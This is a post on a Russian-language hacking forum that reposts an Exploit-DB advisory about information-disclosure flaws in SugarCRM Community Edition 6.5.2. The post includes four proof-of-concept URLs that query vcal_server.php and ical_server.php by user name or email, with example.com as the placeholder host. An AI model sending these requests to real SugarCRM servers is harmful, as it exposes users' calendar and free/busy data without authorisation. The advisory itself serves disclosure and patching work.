SugarCRM Community Edition - Multiple Information Disclosure Vulnerabilities | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 37691

Проверка EDB

Пройдено

Автор: BRENDAN COLES

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: N/A

Дата публикации: 2012-08-31

SugarCRM Community Edition - Multiple Information Disclosure Vulnerabilities

Код:

source: https://www.securityfocus.com/bid/55347/info

SugarCRM Community Edition is prone to multiple information-disclosure vulnerabilities because it fails to restrict access to certain application data.

Attackers can exploit these issues to obtain sensitive information that may lead to further attacks.

SugarCRM Community Edition 6.5.2 is vulnerable; other versions may also be affected.

http://www.example.com/sugarcrm/vcal_server.php?type=vfb&[email protected]

http://www.example.com/sugarcrm/vcal_server.php?type=vfb&user_name=will

http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&[email protected]

http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&user_name=will

Источник: www.exploit-db.com

Поиск

Exploit SugarCRM Community Edition - Multiple Information Disclosure Vulnerabilities

Exploiter

Похожие темы